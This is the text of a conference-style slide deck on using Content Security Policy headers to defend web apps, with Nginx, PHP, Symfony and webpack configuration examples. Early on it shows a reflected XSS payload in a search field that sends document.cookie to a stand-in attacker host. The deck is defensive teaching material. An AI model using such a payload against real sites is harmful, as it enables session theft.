@nathandench
Blog: https://ndench.github.io/security/csp-can-see-purpose
@nathandench
Hyra iQ
We automate high volume contract negotiation for retail and commercial landlords and their law firms
@nathandench
@nathandench
@nathandench
<html>
...
<script>
// ...
$('#searchTerm').val('Nissan');
</script>
...
</html>
Search for:
Nissan
@nathandench
..
<script>
// ...
$('#searchTerm').val('');location.href='http://evilcyberhacker.com?cookies='+encodeURIComponent(document.cookie);//');
</script>
..
Search for:
');location.href='http://evilcyberhacker.com?cookies='%2BencodeURIComponent(document.cookie);//'
@nathandench
@nathandench
@nathandench
@nathandench
@nathandench
Directives:
Values:
@nathandench
Content-Security-Policy:
default-src 'none';
script-src: 'self';
style-src: 'self' fonts.googleapis.com;
image-src: instagram.com;
report-uri: example.report-uri.com/r/d/csp/enforce
Example CSP
@nathandench
Content-Security-Policy-Report-Only
@nathandench
X-Content-Security-Policy
@nathandench
add_header Content-Security-Policy-Report-Only "default-src: 'none'; ..."
Nginx config
@nathandench
<?php
// Vanilla PHP
header('Content-Security-Policy-Report-Only "default-src \'none\'; ..."');
// Symfony Response
$response->headers->set('Content-Security-Policy-Report-Only', "default-src 'none'; ...','");
Application code - manually
@nathandench
---
nelmio_security:
csp:
report:
block-all-mixed-content: true
default-src: ['none']
3rd party library
@nathandench
---
nelmio_security:
csp:
report:
block-all-mixed-content: true
default-src: ['none']
@nathandench
@nathandench
---
nelmio_security:
csp:
report:
block-all-mixed-content: true
default-src: ['none']
script-src:
- 'self'
...
style-src:
- 'self'
...
font-src:
- 'self'
...
img-src:
- 'self'
...
connect-src:
- 'self'
...
@nathandench
<script nonce="{{ csp_nonce('script') }}">
...
</script>
Content-Security-Policy script-src: 'nonce-67eab753ab3f0a713e02b07421dae6b7' ...
@nathandench
...
plugins: [
devtool: 'eval'
...
],
...
---
# Only in development
nelmio_security:
csp:
report:
script-src:
- 'unsafe-eval'
@nathandench
---
nelmio_security:
csp:
report:
report-uri: https://example.report-uri.com/r/d/csp/reportOnly
block-all-mixed-content: true
default-src: ['none']
script-src:
- 'self'
...
@nathandench
@nathandench
...
module.exports = (env, argv) {
let production = argv.mode === 'production'
...
return {
...
plugins: [
devtool: production ? false : 'eval'
...
],
}
}
...
@nathandench
<!-- Pretend to be a button with inline script -->
<a href="javascript:void(0)" class="btn btn-default">
<!-- Pretend to be a button without `href` -->
<a tabindex="0" class="btn btn-default">
@nathandench
---
nelmio_security:
csp:
- report:
- report-uri: https://example.report-uri.com/r/d/csp/reportOnly
block-all-mixed-content: true
+ enforce:
+ report-uri: https://example.report-uri.com/r/d/csp/enforce
block-all-mixed-content: true
default-src: ['none']
script-src:
- 'self'
...
@nathandench
Content-Security-Policy
@nathandench
We're hiring fullstack web devs!
nathan@hyraiq.com